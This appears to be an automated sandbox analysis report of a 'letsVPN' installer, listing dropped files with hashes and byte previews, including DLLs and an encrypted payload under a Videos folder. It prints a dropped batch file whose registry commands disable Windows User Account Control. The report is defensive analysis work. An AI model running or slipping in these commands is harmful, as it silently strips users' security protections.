                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\oemvista.inf (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\tap0901.cat (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10739
                                                                                                                                                                                                  Entropy (8bit):7.214364446291792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
                                                                                                                                                                                                  MD5:F73AC62E8DF97FAF3FC8D83E7F71BF3F
                                                                                                                                                                                                  SHA1:619A6E8F7A9803A4C71F73060649903606BEAF4E
                                                                                                                                                                                                  SHA-256:CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
                                                                                                                                                                                                  SHA-512:F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:0.)...*.H........).0.)....1.0...`.H.e......0..i..+.....7.....Z0..V0...+.....7.......r?.X.M.....F.A..201008141946Z0...+.....7.....0..T0.... .....S!F.3....#.a.2`..e...#e...1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .....S!F.3....#.a.2`..e...#e...0...."~..m..8C. i$.4.l..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0.... ..j(.M<.cR..XrT....F..R.]....?1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..j(.M<.cR..XrT....F..R.]....?0.....".....A.Rw..... .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f.......0...0....+.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\tap0901.sys (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\06VAP.bat

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:ASCII text, with CR, LF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):392
                                                                                                                                                                                                  Entropy (8bit):5.141040221765098
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:jLMVjhR1mWEMlTLMVjhR1ZTLMVjhR16Xn:jIV1PMmIV1PZIV1P6X
                                                                                                                                                                                                  MD5:30D6EB22D6AEEC10347239B17B023BF4
                                                                                                                                                                                                  SHA1:E2A6F86D66C699F6E0FF1AC4E140AF4A2A4637D1
                                                                                                                                                                                                  SHA-256:659DF6B190A0B92FC34E3A4457B4A8D11A26A4CAF55DE64DFE79EB1276181F08
                                                                                                                                                                                                  SHA-512:500872C3F2F3F801EC51717690873194675CB7F32CC4A862C09D90C18638D364D49B0E04C32323F52734E5C806E3503A63AC755C7019D762786A72840123DF76
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F ..reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F ..reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F ..

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn\LetsVPN.lnk

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Dec 2 05:34:42 2024, mtime=Sun Dec 29 14:14:39 2024, atime=Mon Dec 2 05:34:42 2024, length=247840, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1100
                                                                                                                                                                                                  Entropy (8bit):4.611535056478566
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:8mnpPiELbdOE4d7iAsD1dyOd/UUPX7qygm:8mnJVHdO77BsD1dyOdsRyg
                                                                                                                                                                                                  MD5:DEB11335AF5E06D15B28346CEB06189F
                                                                                                                                                                                                  SHA1:320E360BC51E86262406AD024E2F6FFF25A5F6B5
                                                                                                                                                                                                  SHA-256:8BE1AC7F41C71B3C11FFD491FC0753AD65246B0D0A9D977E606D9AC70022A76C
                                                                                                                                                                                                  SHA-512:64501C50E7AF93D4A61811791E52D9955C6548BDFF3616DB9ADA2971E39536F812DEBD7BF93DD868F8DB4EA34D3FD9344C91235D7CE8A1C76534A63240672E48
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:L..................F.... ....-.D.D..E..a.Z...-.D.D.. ............................P.O. .:i.....+00.../C:\.....................1......Y.y..PROGRA~2.........O.I.Y.y....................V.....}...P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....V.1......Y.y..letsvpn.@......Y.y.Y.y....c.....................lPS.l.e.t.s.v.p.n.....b.2. ....YU4 .LetsPRO.exe.H......YU4.Y.y....j.........................L.e.t.s.P.R.O...e.x.e.......Y...............-.......X............G.......C:\Program Files (x86)\letsvpn\LetsPRO.exe..B.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.\.L.e.t.s.P.R.O...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.........*................@Z|...K.J.........`.......X.......760639...........hT..CrF.f4... .".*......-...-$..hT..CrF.f4... .".*......-...-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn\Uninstall.lnk

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):824
                                                                                                                                                                                                  Entropy (8bit):3.377677862485207
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:8wl0Va/ledp8A/LK4YRMbdpYgRtbdpYqQ/CNUvH4t2YZ/elFlSJm:8BdOAW4Y+djXdYOUFqy
                                                                                                                                                                                                  MD5:0011458DE2BFE4556889186A69473E2A
                                                                                                                                                                                                  SHA1:03B075F79791A3EA20E0CA82DC375F1E980C4386
                                                                                                                                                                                                  SHA-256:DB3312C1A2D480E1416930D0F28A1EDA75143B3FDF312C1F19510534FD37B9FA
                                                                                                                                                                                                  SHA-512:DA5DD6E5A253F13702DEB42BBA8E37349CB262F311D557B8891AD761387AF2B96B6B91E4BF7E637D3A7C14E2BFE61E476E44703417DE79930B210243A1B20082
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:L..................F........................................................_....P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".V.1...........letsvpn.@............................................l.e.t.s.v.p.n.....`.2...........uninst.exe..F............................................u.n.i.n.s.t...e.x.e.......A.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.\.u.n.i.n.s.t...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.........*................@Z|...K.J.....................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

                                                                                                                                                                                                  C:\Users\user\Desktop\LetsVPN.lnk

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Dec 2 05:34:42 2024, mtime=Sun Dec 29 14:15:01 2024, atime=Mon Dec 2 05:34:42 2024, length=247840, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1064
                                                                                                                                                                                                  Entropy (8bit):4.657443208752987
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:8m5iELbdOE4g4n7iAsDXdyOd/UUPX7qygm:8m5VHdOKg7BsDXdyOdsRyg
                                                                                                                                                                                                  MD5:384D2117F598DFFF44588166254CE440
                                                                                                                                                                                                  SHA1:8910055694CD4F3DD766403348DD82AB8B348B03
                                                                                                                                                                                                  SHA-256:4E8A7A3A305592E8B063538E615D4A7561C15F941FE06801FF14CA35F57994ED
                                                                                                                                                                                                  SHA-512:008F4E6D3A3ABC04A7E0FA541D9AE092DD351ED8647957BB45297C5A4D36ED83CA63397BBD3D89EF62E6EF5C0BF9801794175EA8DEDFF6488C86CE1FA01AAB76
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:L..................F.... ....-.D.D.....n.Z...-.D.D.. ............................P.O. .:i.....+00.../C:\.....................1......Y.y..PROGRA~2.........O.I.Y.y....................V.....}...P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....V.1......Y.y..letsvpn.@......Y.y.Y.y....c.........................l.e.t.s.v.p.n.....b.2. ....YU4 .LetsPRO.exe.H......YU4.Y.y....j.........................L.e.t.s.P.R.O...e.x.e.......Y...............-.......X............G.......C:\Program Files (x86)\letsvpn\LetsPRO.exe..0.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.\.L.e.t.s.P.R.O...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.........*................@Z|...K.J.........`.......X.......760639...........hT..CrF.f4... .".*......-...-$..hT..CrF.f4... .".*......-...-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9

                                                                                                                                                                                                  C:\Users\user\Videos\D73040F4~16\Iozvmlb.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):258328
                                                                                                                                                                                                  Entropy (8bit):6.64001582449504
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:/BstfXX0BcNv96T+CZxJK30D62E9NTBqCmN1BIKXXuo:pI0Bc/Y5K3m62E9NTsCmNg2V
                                                                                                                                                                                                  MD5:68411B35F7B40B45AFC4A60A2681549D
                                                                                                                                                                                                  SHA1:98377319160E6DA97FD6E5D97AFE2441E0FE21A6
                                                                                                                                                                                                  SHA-256:5C3A73321F59CDC28164D79E8B60ECC57A90FF398A2CDBDE2BB718C8E9500D23
                                                                                                                                                                                                  SHA-512:CC509C4F41F86C9191BF5FBB826A362FFEF2BC78046B99356F944F39A17ED1AB17A6286FFE6AD03C290F6BBCE492F0DE96954B4C1075B27771C491C2CA027156
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L....w.X.w.X.w.XN&_X.w.XN&`X.w.XN&]X.w.XN&aX.w.X...X.w.X...X.w.X.%`X.w.X.%]X.w.X.w.X.u.X.%aX.w.X.%[X.w.X.w.X.w.X.%^X.w.XRich.w.X................PE..L....D.V.........."..........$......W|............@.......................................@.................................Lf..................................D,..p................................4..@...............(....e..@....................text............................... ..`.rdata..............................@..@.data...0...........................@....rsrc...............................@..@.reloc..D,..........................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Videos\D73040F4~16\SK.TXT

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):209725
                                                                                                                                                                                                  Entropy (8bit):7.999155296684028
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:3072:bV6ppx9d6U0IqLcls38CNNvbW0ZouvuEVjzR00GSMtIILB/FjzpajiE5liIw8/K+:84Ibls3BNvb9ouxk9BLDzKiMiQ/Ko+y9
                                                                                                                                                                                                  MD5:242BB7507E0B2A8038F847830F926FEC
                                                                                                                                                                                                  SHA1:C391FC67566884065EB8A16961E5405D5B44677B
                                                                                                                                                                                                  SHA-256:7BAB7993F44F9835A44FC93CCE3D513FCBAE2395DAC085DB7F0748B2A21CCA32
                                                                                                                                                                                                  SHA-512:E0E4A997638BF95A558EBB877A2D5E64F2D3A2D2A81D7F15C4453B194E18F3A5BC07589EDB3BC18FDCE1996CFB50B0B00D1FFDF421002E37608EB861F3E7D36C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:.....q...*.j..|..q..f)...%...._..T02...i...L...59(]Sq`6..7...W.<=.K]:.qX...U......S..(cr".6...$.`......c.q8.-%>^Q1....8.j.|....FA..N...v..w..J...#&...*.......v...>.~..2O.5.rc.-....6.@...............*.eV>. :..Xh.-....+.xP.q.....]., ~1Q...K.'.....4...jO...........j.Q.>m...(..bc.u07.6.^{......A\..*Z.-.\.%.........w..Cs.6.........)O+KQ`.JT..m..k6...#M..r_H........0.%7.\Sa.Oq........J.p....6..H.g.P..&.:..ngm4.+...Z.y%V.O.e...h.h...........Zn......y...I......q.....a.k%.C['..+.>d.e.(.-.l..w..rM.I).E...5.>B/sQHh...f....E>.<..[.x.^..].....FO.Q.9|..`........O...L..l........;.Yx.,.Ft/xW}.V].A..c.......L....8...nt;:d1....z.-.&[..w..jR@~.)...L.D..............e:.+....,.z.(J....1.J..........).Wn....RA`.&.._..PH.....0'n6.2:e...1.J....i.?.KQ.X........D@# ..}&W.D...U.S....WE...Y.6b...*.<w.....M.y..;...v|..1.s...n..7V.........u.4.u.X>=....>..W.u..AZb......UM.&l8..+..K6U..^.6...I.[.:s..............'<J......j.>|r....8Z.w.H4........r...i.(..al...Y..X.i..y.#

                                                                                                                                                                                                  C:\Users\user\Videos\D73040F4~16\base.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2482688
                                                                                                                                                                                                  Entropy (8bit):6.599322698372088
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:HymviY7ZdM+3023FbNifZoGlBP3+IoA7YRAt+RB48UOexIFQHkaS5Jv/PfT:HziCdt3023FbNifZ1D3+IoEt+RS8UOel
                                                                                                                                                                                                  MD5:72ADFBFC97B1F1E7ABA3F63CD264C0B2
                                                                                                                                                                                                  SHA1:93DFEBD64B0FC0AA932E23A5D4E6A32CEBE7CF32
                                                                                                                                                                                                  SHA-256:77762C479E46D1DF205EB020D4C1AF5CCD8E433111DC63BE53B2401C7B8257AC
                                                                                                                                                                                                  SHA-512:7AF6E43B7C6086646D1CAC37234658722ABDF466689AB58459468095722E66DB0ED008DA5B2F731D8FB28F60F52EA1FD0C3501C47A79678EB1F6392AF61CB004
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.*!..y!..y!..y(.xy-..y(.hy...y!..y..yN.ey...yN.Qy...yN.PyS..yN.Ty#..yN.`y ..yN.ay ..yN.fy ..yRich!..y................PE..L.../.cg...........!................M.........................................&.......&...@.....................................T....0#..0...................p#..U......................................@............................................text...n........................... ..`.rdata..............................@..@.data...<x.... ....... .............@....rsrc....0...0#..2...j".............@..@.reloc..JD...p#..F....".............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Videos\D73040F4~16\msvcp120.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):455328
                                                                                                                                                                                                  Entropy (8bit):6.698367093574994
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:uZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77/:W/8wVwHZFTwFOOos3Ooc8DHkC2e77/
                                                                                                                                                                                                  MD5:FD5CABBE52272BD76007B68186EBAF00
                                                                                                                                                                                                  SHA1:EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
                                                                                                                                                                                                  SHA-256:87C42CA155473E4E71857D03497C8CBC28FA8FF7F2C8D72E8A1F39B71078F608
                                                                                                                                                                                                  SHA-512:1563C8257D85274267089CD4AEAC0884A2A300FF17F84BDB64D567300543AA9CD57101D8408D0077B01A600DDF2E804F7890902C2590AF103D2C53FF03D9E4A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+.N+.N+.N.3wN).N+.N..Nm.aN(.Nm.cN#.Nm.]N..Nm.\Ne.Nm.YN-.Nm.`N*.Nm.gN*.Nm.bN*.NRich+.N........................PE..L....|OR.........."!.........................0.......................................x....@..........................W..L...<...<........................>.......D...................................K..@...............<............................text...<........................... ..`.data....^...0...0... ..............@....idata...............P..............@..@.rsrc................j..............@..@.reloc...D.......F...n..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Videos\D73040F4~16\msvcr120.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):970912
                                                                                                                                                                                                  Entropy (8bit):6.9649735952029515
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                                                                                                  MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                                                                                                  SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                                                                                                  SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                                                                                                  SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\INF\oem4.inf

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try

                                                                                                                                                                                                  C:\Windows\INF\setupapi.dev.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:Generic INItialization configuration [BeginLog]
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):58531
                                                                                                                                                                                                  Entropy (8bit):5.206385160976729
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:OGdni80C/8g0atRf7yr14ujuNY9AZi3Z/oUtwrzUQ5SE2e3nke2jR4Ui6eja:Own95cdyYloiwnlz2eB2j7eu
                                                                                                                                                                                                  MD5:A1F93E71400ED26C744C66DDFFA965C9
                                                                                                                                                                                                  SHA1:9AE929149D8DAFD2DB8360622FEFAFE019950D01
                                                                                                                                                                                                  SHA-256:5B6F60FD190349C1C8DBB50CC4AA243875BC8FAADF8BD66B4DE228E2D2ED2D11
